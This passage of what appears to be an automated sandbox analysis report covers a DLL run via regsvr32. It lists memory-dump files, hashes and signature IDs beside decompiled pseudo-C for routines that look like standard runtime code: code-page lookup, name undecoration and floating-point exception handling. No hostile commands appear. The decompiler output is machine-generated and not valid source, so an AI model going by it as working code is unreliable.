                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Name::operator+
                                                                      • String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
                                                                      • API String ID: 2943138195-757766384
                                                                      • Opcode ID: 1fd3084e1113738a231a4cf439eeec82300efcfede38ebe96cb92583284368a6
                                                                      • Instruction ID: d5e262563f3e8678584b73df17a054c086395605fce64d0347f5d1e8045728b8
                                                                      • Opcode Fuzzy Hash: 1fd3084e1113738a231a4cf439eeec82300efcfede38ebe96cb92583284368a6
                                                                      • Instruction Fuzzy Hash: 74716C72600B4898FB978F28D8923EE67A5B70D7C4F55C51AFA4907AA5DF39C398C300
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 76%
                                                                      			E0000000118004FFB4(void* __ecx, void* __edx, void* __esi, long long __rbx, intOrPtr* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi, void* __r8, signed int __r9, void* __r10) {
                                                                      				intOrPtr _t37;
                                                                      				intOrPtr _t49;
                                                                      				void* _t50;
                                                                      				void* _t88;
                                                                      				intOrPtr* _t89;
                                                                      				intOrPtr* _t91;
                                                                      				intOrPtr* _t94;
                                                                      				intOrPtr* _t115;
                                                                      				intOrPtr* _t119;
                                                                      				long long _t122;
                                                                      				void* _t123;
                                                                      				void* _t125;
                                                                      				signed long long _t138;
                                                                      				void* _t139;
                                                                      				void* _t141;
                                                                      				int _t143;
                                                                      				intOrPtr* _t144;
                                                                      				void* _t146;
                                                                      				intOrPtr* _t147;
                                                                      
                                                                      				_t111 = __rdx;
                                                                      				_t50 = __ecx;
                                                                      				_t88 = _t125;
                                                                      				 *((long long*)(_t88 + 8)) = __rbx;
                                                                      				 *((long long*)(_t88 + 0x10)) = _t122;
                                                                      				 *((long long*)(_t88 + 0x18)) = __rsi;
                                                                      				 *((long long*)(_t88 + 0x20)) = __rdi;
                                                                      				_t123 = __r8;
                                                                      				_t144 = __rdx;
                                                                      				_t115 = __rcx;
                                                                      				E00000001180038680(_t88, __rbx, __rdx, __rsi, _t146);
                                                                      				r12d = 0;
                                                                      				_t5 = _t88 + 0x98; // 0x98
                                                                      				_t94 = _t5;
                                                                      				_t89 = _t115 + 0x80;
                                                                      				 *((intOrPtr*)(_t94 + 0x10)) = r12d;
                                                                      				_t8 = _t94 + 0x258; // 0x2f0
                                                                      				_t147 = _t8;
                                                                      				 *_t94 = _t115;
                                                                      				_t9 = _t94 + 8; // 0xa0
                                                                      				_t119 = _t9;
                                                                      				 *_t147 = r12w;
                                                                      				 *_t119 = _t89;
                                                                      				if ( *_t89 == r12w) goto 0x80050029;
                                                                      				_t10 = _t141 + 0x16; // 0x16
                                                                      				E00000001180050218(_t10, _t94, 0x80063ee0, _t115, _t119, _t119);
                                                                      				if ( *((intOrPtr*)( *_t94)) == r12w) goto 0x8005007f;
                                                                      				if ( *((intOrPtr*)( *_t119)) == r12w) goto 0x80050042;
                                                                      				E000000011800502B4(_t94, _t94, _t119, __r9);
                                                                      				goto 0x80050047;
                                                                      				E00000001180050670(_t94, _t94, _t119, __r9);
                                                                      				if ( *((intOrPtr*)(_t94 + 0x10)) != r12d) goto 0x8005008e;
                                                                      				if (E00000001180050218(0x40, _t94, 0x80063ac0, _t115, _t119, _t94) == 0) goto 0x80050084;
                                                                      				_t91 =  *_t119;
                                                                      				if ( *_t91 == r12w) goto 0x80050078;
                                                                      				E000000011800502B4(_t94, _t94, _t94, __r9);
                                                                      				goto 0x80050084;
                                                                      				E00000001180050670(_t94, _t94, _t94, __r9);
                                                                      				goto 0x80050084;
                                                                      				E000000011800507F4(_t50,  *_t91 - r12w, _t94, _t94, _t111, _t119, _t94, __r9, __r10);
                                                                      				if ( *((intOrPtr*)(_t94 + 0x10)) == r12d) goto 0x800501e1;
                                                                      				if ( *_t115 != r12w) goto 0x800500a9;
                                                                      				if ( *((intOrPtr*)(_t115 + 0x100)) != r12w) goto 0x800500a9;
                                                                      				GetACP();
                                                                      				goto 0x800500b1;
                                                                      				_t37 = E0000000118005089C(_t94, _t115 + 0x100, _t94, _t119);
                                                                      				_t49 = _t37;
                                                                      				if (_t37 == 0) goto 0x800501e1;
                                                                      				if (_t37 == 0xfde8) goto 0x800501e1;
                                                                      				if (IsValidCodePage(_t143) == 0) goto 0x800501e1;
                                                                      				if (_t144 == 0) goto 0x800500df;
                                                                      				 *_t144 = _t49;
                                                                      				if (_t123 == 0) goto 0x800501da;
                                                                      				_t120 = _t123 + 0x120;
                                                                      				 *((intOrPtr*)(_t123 + 0x120)) = r12w;
                                                                      				_t138 = (__r9 | 0xffffffff) + 1;
                                                                      				if ( *((intOrPtr*)(_t147 + _t138 * 2)) != r12w) goto 0x800500f7;
                                                                      				_t139 = _t138 + 1;
                                                                      				if (E0000000118004FD50(0x55, _t91, _t94, _t123 + 0x120, _t94, _t123 + 0x120, _t147, _t139, _t141) != 0) goto 0x80050202;
                                                                      				_t17 = _t91 + 0x40; // 0x40
                                                                      				r9d = _t17;
                                                                      				if (E00000001180036CD0(0x1001, _t91, _t94, _t123 + 0x120, _t123 + 0x120, _t123, _t123) == 0) goto 0x800501e1;
                                                                      				r9d = 0x40;
                                                                      				if (E00000001180036CD0(0x1002, _t91, _t94, _t120, _t120, _t123, _t123 + 0x80) == 0) goto 0x800501e1;
                                                                      				E00000001180055974(0x5f, _t123 + 0x80, _t139);
                                                                      				if (_t91 != 0) goto 0x8005017f;
                                                                      				_t19 = _t91 + 0x2e; // 0x2e
                                                                      				E00000001180055974(_t19, _t123 + 0x80, _t139);
                                                                      				if (_t91 == 0) goto 0x80050198;
                                                                      				r9d = 0x40;
                                                                      				_t20 = _t139 - 0x39; // 0x7
                                                                      				if (E00000001180036CD0(_t20, _t91, _t94, _t120, _t120, _t123, _t123 + 0x80) == 0) goto 0x800501e1;
                                                                      				if (_t49 != 0xfde9) goto 0x800501c6;
                                                                      				r9d = 5;
                                                                      				_t22 = _t139 + 0xb; // 0x4b
                                                                      				if (E0000000118004FD50(_t22, _t123 + 0x100, _t94, _t123 + 0x100, _t94, _t120, L"utf8", _t139) != 0) goto 0x80050202;
                                                                      				goto 0x800501da;
                                                                      				r9d = 0xa;
                                                                      				_t23 = _t139 + 6; // 0x46
                                                                      				r8d = _t23;
                                                                      				E0000000118005A060(_t49);
                                                                      				goto 0x800501e3;
                                                                      				return 0;
                                                                      			}






















                                                                      0x18004ffb4
                                                                      0x18004ffb4
                                                                      0x18004ffb4
                                                                      0x18004ffb7
                                                                      0x18004ffbb
                                                                      0x18004ffbf
                                                                      0x18004ffc3
                                                                      0x18004ffd1
                                                                      0x18004ffd4
                                                                      0x18004ffd7
                                                                      0x18004ffda
                                                                      0x18004ffdf
                                                                      0x18004ffe5
                                                                      0x18004ffe5
                                                                      0x18004ffec
                                                                      0x18004fff3
                                                                      0x18004fff7
                                                                      0x18004fff7
                                                                      0x18004fffe
                                                                      0x180050001
                                                                      0x180050001
                                                                      0x180050005
                                                                      0x180050009
                                                                      0x180050010
                                                                      0x180050015
                                                                      0x180050021
                                                                      0x180050030
                                                                      0x180050039
                                                                      0x18005003b
                                                                      0x180050040
                                                                      0x180050042
                                                                      0x18005004b
                                                                      0x180050063
                                                                      0x180050065
                                                                      0x18005006f
                                                                      0x180050071
                                                                      0x180050076
                                                                      0x180050078
                                                                      0x18005007d
                                                                      0x18005007f
                                                                      0x180050088
                                                                      0x180050099
                                                                      0x18005009f
                                                                      0x1800500a1
                                                                      0x1800500a7
                                                                      0x1800500ac
                                                                      0x1800500b1
                                                                      0x1800500b5
                                                                      0x1800500c0
                                                                      0x1800500d1
                                                                      0x1800500da
                                                                      0x1800500dc
                                                                      0x1800500e2
                                                                      0x1800500e8
                                                                      0x1800500f3
                                                                      0x1800500f7
                                                                      0x1800500ff
                                                                      0x180050101
                                                                      0x180050116
                                                                      0x18005011c
                                                                      0x18005011c
                                                                      0x180050132
                                                                      0x18005013f
                                                                      0x180050157
                                                                      0x180050165
                                                                      0x18005016d
                                                                      0x18005016f
                                                                      0x180050175
                                                                      0x18005017d
                                                                      0x18005017f
                                                                      0x18005018b
                                                                      0x180050196
                                                                      0x1800501a5
                                                                      0x1800501a7
                                                                      0x1800501b7
                                                                      0x1800501c2
                                                                      0x1800501c4
                                                                      0x1800501c6
                                                                      0x1800501d1
                                                                      0x1800501d1
                                                                      0x1800501d5
                                                                      0x1800501df
                                                                      0x180050201

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLastNameTranslate$CodePageValidValue
                                                                      • String ID: utf8
                                                                      • API String ID: 1791977518-905460609
                                                                      • Opcode ID: a3f4a97191b3732628c639c0cece0c1357c8578333481a24dfc8d3bde307a593
                                                                      • Instruction ID: 0a562e158d1f5042b8f9a6893a8e562eb4687a1b9185bdcacabf2722ec433f13
                                                                      • Opcode Fuzzy Hash: a3f4a97191b3732628c639c0cece0c1357c8578333481a24dfc8d3bde307a593
                                                                      • Instruction Fuzzy Hash: 7E517B32300B48C1EAA6AF21D9513ED27A5E748BC0F64C121BE49677D6EF7AC789C345
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 45%
                                                                      			E000000011800319A8(void* __edx, long long __rbx, long long __rcx, long long __rdi, void* __r8, long long _a16, long long _a24) {
                                                                      				void* _v8;
                                                                      				signed int _v24;
                                                                      				void* _v25;
                                                                      				char _v40;
                                                                      				char _v56;
                                                                      				intOrPtr _v64;
                                                                      				char _v72;
                                                                      				signed int _v80;
                                                                      				signed long long _v88;
                                                                      				void* _t35;
                                                                      				intOrPtr _t43;
                                                                      				signed long long _t53;
                                                                      				intOrPtr* _t55;
                                                                      				long long _t64;
                                                                      				intOrPtr* _t69;
                                                                      				intOrPtr _t86;
                                                                      				long long _t87;
                                                                      				void* _t90;
                                                                      
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rdi;
                                                                      				_t53 =  *0x80072078; // 0xc949cbcab002
                                                                      				_v24 = _t53 ^ _t90 - 0x00000070;
                                                                      				_t55 =  *0x800738a8; // 0x0
                                                                      				_t64 = __rcx;
                                                                      				_t43 =  *_t55;
                                                                      				if (_t43 != 0x58) goto 0x80031a0f;
                                                                      				_v64 = 4;
                                                                      				 *0x800738a8 = _t55 + 1;
                                                                      				_v72 = "void";
                                                                      				asm("movaps xmm0, [ebp-0x40]");
                                                                      				asm("movdqa [ebp-0x50], xmm0");
                                                                      				E0000000118002E4E4(__rcx,  &_v88);
                                                                      				goto 0x80031aee;
                                                                      				if (_t43 != 0x3f) goto 0x80031ad9;
                                                                      				E000000011800305E4(__rcx,  &_v72);
                                                                      				if (( *0x800738b8 & 0x00004000) == 0) goto 0x80031a90;
                                                                      				_t86 =  *0x800738c0; // 0x0
                                                                      				if (_t86 == 0) goto 0x80031a90;
                                                                      				_t69 = _v72;
                                                                      				if (_t69 == 0) goto 0x80031a63;
                                                                      				 *0x8007a008();
                                                                      				 *((char*)( *((intOrPtr*)( *_t69 + 0x18)))) = 0;
                                                                      				_t87 =  *0x800738c0; // 0x0
                                                                      				goto 0x80031a67;
                                                                      				_v40 = 0;
                                                                      				_t35 = E0000000118002B014( *((intOrPtr*)( *_t69 + 0x18)), _t64,  &_v40, _t87);
                                                                      				 *0x8007a008();
                                                                      				if (_t87 == 0) goto 0x80031a90;
                                                                      				r8d = 0;
                                                                      				E00000001180036344(_t64, _t87);
                                                                      				goto 0x80031aee;
                                                                      				_v80 = 0x13;
                                                                      				_v88 = "`template-parameter";
                                                                      				asm("movaps xmm0, [ebp-0x50]");
                                                                      				asm("movdqa [ebp-0x50], xmm0");
                                                                      				E0000000118002E4E4( &_v56,  &_v88);
                                                                      				E0000000118002E98C("`template-parameter",  &_v88,  &_v72);
                                                                      				r8b = 0x27;
                                                                      				E0000000118002E9B8( &_v88, _t64);
                                                                      				goto 0x80031aee;
                                                                      				_v88 = _v88 & 0x00000000;
                                                                      				_v80 = _v80 & 0x00000000;
                                                                      				return E00000001180002FB0(E00000001180033210(_t64, _t64,  &_v88, _t87,  &_v72), _t35, _v24 ^ _t90 - 0x00000070);
                                                                      			}





















                                                                      0x1800319a8
                                                                      0x1800319ad
                                                                      0x1800319ba
                                                                      0x1800319c4
                                                                      0x1800319c8
                                                                      0x1800319cf
                                                                      0x1800319d2
                                                                      0x1800319d7
                                                                      0x1800319dc
                                                                      0x1800319e3
                                                                      0x1800319f8
                                                                      0x1800319fc
                                                                      0x180031a00
                                                                      0x180031a05
                                                                      0x180031a0a
                                                                      0x180031a12
                                                                      0x180031a1c
                                                                      0x180031a2b
                                                                      0x180031a2d
                                                                      0x180031a37
                                                                      0x180031a39
                                                                      0x180031a40
                                                                      0x180031a51
                                                                      0x180031a57
                                                                      0x180031a5a
                                                                      0x180031a61
                                                                      0x180031a63
                                                                      0x180031a6b
                                                                      0x180031a75
                                                                      0x180031a7e
                                                                      0x180031a80
                                                                      0x180031a89
                                                                      0x180031a8e
                                                                      0x180031a90
                                                                      0x180031a9e
                                                                      0x180031aa6
                                                                      0x180031aae
                                                                      0x180031ab3
                                                                      0x180031ac3
                                                                      0x180031ac8
                                                                      0x180031ad2
                                                                      0x180031ad7
                                                                      0x180031ad9
                                                                      0x180031ae2
                                                                      0x180031b0e

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: NameName::
                                                                      • String ID: `template-parameter$void
                                                                      • API String ID: 1333004437-4057429177
                                                                      • Opcode ID: fafdc32a5fe371d384a2473ef813343c6153c0300beca120572b9f71e54bf2d2
                                                                      • Instruction ID: efb2359ce5d0afa6c2b31ac18a1db5769dcbc5fa683fb7d8f93e8eb5301e9941
                                                                      • Opcode Fuzzy Hash: fafdc32a5fe371d384a2473ef813343c6153c0300beca120572b9f71e54bf2d2
                                                                      • Instruction Fuzzy Hash: 64413632B01B5888FB829BA4D8513EE23B1B70C7C9F558026EE4D67A59DF78C649C351
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Window$CreateShowUpdate
                                                                      • String ID: MTGESTURES$MTGestures
                                                                      • API String ID: 2944774295-2581655193
                                                                      • Opcode ID: 2eb83c9ef4df88db5e1e20b7618999b4e625a6ddc9494372bbe72fad33adba27
                                                                      • Instruction ID: 7c8a503b4ae263fd9fcf1ce31347e70e2cdbb5577954c8500c129b2b49678530
                                                                      • Opcode Fuzzy Hash: 2eb83c9ef4df88db5e1e20b7618999b4e625a6ddc9494372bbe72fad33adba27
                                                                      • Instruction Fuzzy Hash: 36119072108B88C6E791CF15F85438AB7A1F388B84F604219FA8947B68CF7DD689CF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: 72dd8dd0f49820123089eadba28ad9e220164ee50fff7094cafe9bdf90aa55ba
                                                                      • Instruction ID: 4ccda45d1d10956041ade0e59d1488c233070d8eb390d6ab8c9d4804fc1b6f16
                                                                      • Opcode Fuzzy Hash: 72dd8dd0f49820123089eadba28ad9e220164ee50fff7094cafe9bdf90aa55ba
                                                                      • Instruction Fuzzy Hash: 0FF062B571170881FB528B64E8587A96321BB8D7E1F648615E57A452E4DF3CC34C9740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 44%
                                                                      			E000000011800560F0(signed int __ecx, long long __rbx, signed int __rcx, void* __rdx, signed int __r8, signed int _a8, long long _a16, signed int _a32) {
                                                                      				signed short _v90;
                                                                      				unsigned int _v92;
                                                                      				unsigned int _v96;
                                                                      				signed int _v100;
                                                                      				char _v104;
                                                                      				void* __rsi;
                                                                      				void* _t43;
                                                                      				signed short _t44;
                                                                      				unsigned int _t48;
                                                                      				unsigned int _t49;
                                                                      				void* _t51;
                                                                      				signed int _t62;
                                                                      				signed int _t63;
                                                                      				void* _t71;
                                                                      				unsigned int _t72;
                                                                      				void* _t75;
                                                                      				signed int _t82;
                                                                      				signed int _t83;
                                                                      				void* _t86;
                                                                      				signed int _t87;
                                                                      				void* _t88;
                                                                      				void* _t89;
                                                                      				signed int _t91;
                                                                      				void* _t92;
                                                                      				signed int _t103;
                                                                      				void* _t106;
                                                                      				signed long long _t108;
                                                                      				void* _t118;
                                                                      				void* _t119;
                                                                      				void* _t126;
                                                                      
                                                                      				_t111 = __rbx;
                                                                      				_a16 = __rbx;
                                                                      				asm("movaps [esp+0x40], xmm6");
                                                                      				asm("movaps [esp+0x30], xmm7");
                                                                      				_t56 = __ecx & 0x0000001f;
                                                                      				_v100 = __ecx & 0x0000001f;
                                                                      				_t3 = _t118 + 0x10; // 0x10
                                                                      				r15d = _t3;
                                                                      				r12d = __ecx;
                                                                      				if ((__ecx & 0x00000008) == 0) goto 0x80056140;
                                                                      				if (r13b >= 0) goto 0x80056140;
                                                                      				E00000001180056900(_t56, _t75, _t106, __rbx, __rcx);
                                                                      				goto 0x800563a2;
                                                                      				_t82 = 0x00000004 & r12b;
                                                                      				if (_t82 == 0) goto 0x8005615e;
                                                                      				asm("dec ecx");
                                                                      				if (_t82 >= 0) goto 0x8005615e;
                                                                      				E00000001180056900(_t56 & 0xfffffff7, _t75, _t106, __rbx, __rcx);
                                                                      				goto 0x800563a2;
                                                                      				_t83 = sil & r12b;
                                                                      				if (_t83 == 0) goto 0x80056221;
                                                                      				asm("dec ecx");
                                                                      				if (_t83 >= 0) goto 0x80056221;
                                                                      				_t43 = E00000001180056900(_t56 & 0xfffffff3, _t75, _t106, __rbx, __rcx);
                                                                      				_t108 = __r8 & __rcx;
                                                                      				if (_t83 == 0) goto 0x800561ec;
                                                                      				if (_t108 == 0x2000) goto 0x800561d3;
                                                                      				if (_t108 == 0x4000) goto 0x800561ba;
                                                                      				_t86 = _t108 - __rcx;
                                                                      				if (_t86 != 0) goto 0x80056219;
                                                                      				asm("movsd xmm0, [ebp]");
                                                                      				asm("comisd xmm0, [0xe162]");
                                                                      				asm("movsd xmm0, [0xe3da]");
                                                                      				if (_t86 > 0) goto 0x80056214;
                                                                      				goto 0x8005620d;
                                                                      				asm("movsd xmm0, [ebp]");
                                                                      				asm("comisd xmm0, [0xe149]");
                                                                      				if (_t86 > 0) goto 0x800561fb;
                                                                      				asm("movsd xmm0, [0xe3bf]");
                                                                      				goto 0x8005620d;
                                                                      				asm("movsd xmm0, [ebp]");
                                                                      				asm("comisd xmm0, [0xe130]");
                                                                      				if (_t86 <= 0) goto 0x80056205;
                                                                      				asm("movsd xmm0, [0xe3a6]");
                                                                      				goto 0x80056214;
                                                                      				asm("movsd xmm0, [ebp]");
                                                                      				asm("comisd xmm0, [0xe117]");
                                                                      				if (_t86 <= 0) goto 0x80056205;
                                                                      				asm("movsd xmm0, [0xe37d]");
                                                                      				goto 0x80056214;
                                                                      				asm("movsd xmm0, [0xe373]");
                                                                      				asm("xorps xmm0, [0xe10c]");
                                                                      				asm("movsd [ebp], xmm0");
                                                                      				goto 0x800563a2;
                                                                      				_t87 = r12b & 0x00000002;
                                                                      				if (_t87 == 0) goto 0x800563a2;
                                                                      				asm("dec ecx");
                                                                      				if (_t87 >= 0) goto 0x800563a2;
                                                                      				asm("movsd xmm0, [edx]");
                                                                      				r14d = r12d;
                                                                      				r14d = r14d >> 4;
                                                                      				asm("xorps xmm7, xmm7");
                                                                      				r14d = r14d & 0x00000001;
                                                                      				asm("ucomisd xmm0, xmm7");
                                                                      				if (_t87 != 0) goto 0x80056253;
                                                                      				if (_t87 == 0) goto 0x80056397;
                                                                      				_t44 = E0000000118005B45C(_t43, _t87,  &_v104);
                                                                      				_t71 = _v104 + 0xfffffa00;
                                                                      				asm("movsd [esp+0x28], xmm0");
                                                                      				_t88 = _t71 - 0xfffffbce;
                                                                      				if (_t88 >= 0) goto 0x80056284;
                                                                      				asm("mulsd xmm0, xmm7");
                                                                      				r14d = 1;
                                                                      				asm("movaps xmm6, xmm0");
                                                                      				goto 0x8005638d;
                                                                      				r9d = 0;
                                                                      				asm("comisd xmm7, xmm0");
                                                                      				r8b = dil;
                                                                      				_a8 = dil;
                                                                      				r9b = _t88 > 0;
                                                                      				_v90 = _t44 & 0x0000000f | r15w;
                                                                      				_a32 = dil;
                                                                      				_t89 = _t71 - 0xfffffc03;
                                                                      				if (_t89 >= 0) goto 0x80056319;
                                                                      				_t48 = _v96;
                                                                      				_t72 = _v92;
                                                                      				_a32 = _t48 & 0x00000001;
                                                                      				if (_t89 == 0) goto 0x800562e8;
                                                                      				r8b = sil;
                                                                      				r14d =  ==  ? 1 : r14d;
                                                                      				_t49 = _t48 >> 1;
                                                                      				_v96 = _t49;
                                                                      				_t91 = sil & _t72;
                                                                      				if (_t91 == 0) goto 0x800562fb;
                                                                      				asm("bts eax, 0x1f");
                                                                      				_v96 = _t49;
                                                                      				if (_t91 != 0) goto 0x800562d1;
                                                                      				_t62 = _v100;
                                                                      				_v92 = _t72 >> 1;
                                                                      				_a8 = r8b;
                                                                      				asm("movsd xmm6, [esp+0x28]");
                                                                      				_t92 = r9d;
                                                                      				if (_t92 == 0) goto 0x80056331;
                                                                      				asm("xorps xmm6, [0xdff5]");
                                                                      				asm("movsd [esp+0x28], xmm6");
                                                                      				asm("comisd xmm7, xmm0");
                                                                      				r15b = _t92 > 0;
                                                                      				if (_a32 != 0) goto 0x80056342;
                                                                      				if (r8b == 0) goto 0x80056387;
                                                                      				_t51 = E0000000118004CF98(0xfffffc03 - _t71, 1, _v96 >> 0x30, __rbx, __rcx,  &_v104 - _t119, _t119);
                                                                      				if (_t51 == 0) goto 0x80056361;
                                                                      				if (_t51 == 0x100) goto 0x8005635c;
                                                                      				if (_t51 != 0x200) goto 0x80056387;
                                                                      				r15b = r15b ^ sil;
                                                                      				goto 0x8005637a;
                                                                      				if (_a32 == dil) goto 0x80056387;
                                                                      				if (_a8 != dil) goto 0x8005637c;
                                                                      				if ((_v96 & sil) == 0) goto 0x80056387;
                                                                      				_v96 = _v96 + _t119;
                                                                      				asm("movsd xmm6, [esp+0x28]");
                                                                      				r15d = 0x10;
                                                                      				asm("movsd [ebp], xmm6");
                                                                      				if (r14d == 0) goto 0x8005639f;
                                                                      				E00000001180056900(_t62, 0xfffffc03 - _t71, _v96 >> 0x30, _t111, _t126);
                                                                      				_t63 = _t62 & 0xfffffffd;
                                                                      				_t103 = r15b & r12b;
                                                                      				if (_t103 == 0) goto 0x800563bb;
                                                                      				asm("dec ecx");
                                                                      				if (_t103 >= 0) goto 0x800563bb;
                                                                      				E00000001180056900(_t63, 0xfffffc03 - _t71, _v96 >> 0x30, _t111, _t126);
                                                                      				asm("movaps xmm6, [esp+0x40]");
                                                                      				asm("movaps xmm7, [esp+0x30]");
                                                                      				dil = (_t63 & 0xffffffef) == 0;
                                                                      				return 0;
                                                                      			}

































                                                                      0x1800560f0
                                                                      0x1800560f0
                                                                      0x180056106
                                                                      0x18005610d
                                                                      0x180056112
                                                                      0x180056118
                                                                      0x18005611f
                                                                      0x18005611f
                                                                      0x180056123
                                                                      0x180056129
                                                                      0x18005612e
                                                                      0x180056133
                                                                      0x18005613b
                                                                      0x180056145
                                                                      0x180056148
                                                                      0x18005614a
                                                                      0x18005614f
                                                                      0x180056151
                                                                      0x180056159
                                                                      0x180056163
                                                                      0x180056166
                                                                      0x18005616c
                                                                      0x180056171
                                                                      0x18005617a
                                                                      0x180056187
                                                                      0x18005618a
                                                                      0x180056192
                                                                      0x18005619a
                                                                      0x18005619c
                                                                      0x18005619f
                                                                      0x1800561a1
                                                                      0x1800561a6
                                                                      0x1800561ae
                                                                      0x1800561b6
                                                                      0x1800561b8
                                                                      0x1800561ba
                                                                      0x1800561bf
                                                                      0x1800561c7
                                                                      0x1800561c9
                                                                      0x1800561d1
                                                                      0x1800561d3
                                                                      0x1800561d8
                                                                      0x1800561e0
                                                                      0x1800561e2
                                                                      0x1800561ea
                                                                      0x1800561ec
                                                                      0x1800561f1
                                                                      0x1800561f9
                                                                      0x1800561fb
                                                                      0x180056203
                                                                      0x180056205
                                                                      0x18005620d
                                                                      0x180056214
                                                                      0x18005621c
                                                                      0x180056221
                                                                      0x180056225
                                                                      0x18005622b
                                                                      0x180056230
                                                                      0x180056236
                                                                      0x18005623a
                                                                      0x18005623d
                                                                      0x180056241
                                                                      0x180056244
                                                                      0x180056247
                                                                      0x18005624b
                                                                      0x18005624d
                                                                      0x180056258
                                                                      0x180056261
                                                                      0x180056267
                                                                      0x18005626d
                                                                      0x180056273
                                                                      0x180056275
                                                                      0x180056279
                                                                      0x18005627c
                                                                      0x18005627f
                                                                      0x180056289
                                                                      0x18005628c
                                                                      0x180056290
                                                                      0x180056293
                                                                      0x18005629b
                                                                      0x1800562ab
                                                                      0x1800562b3
                                                                      0x1800562ba
                                                                      0x1800562c0
                                                                      0x1800562c2
                                                                      0x1800562cd
                                                                      0x1800562d5
                                                                      0x1800562dc
                                                                      0x1800562e1
                                                                      0x1800562e4
                                                                      0x1800562e8
                                                                      0x1800562ea
                                                                      0x1800562ee
                                                                      0x1800562f1
                                                                      0x1800562f3
                                                                      0x1800562f7
                                                                      0x180056300
                                                                      0x180056302
                                                                      0x18005630d
                                                                      0x180056311
                                                                      0x180056319
                                                                      0x18005631f
                                                                      0x180056322
                                                                      0x180056324
                                                                      0x18005632b
                                                                      0x180056331
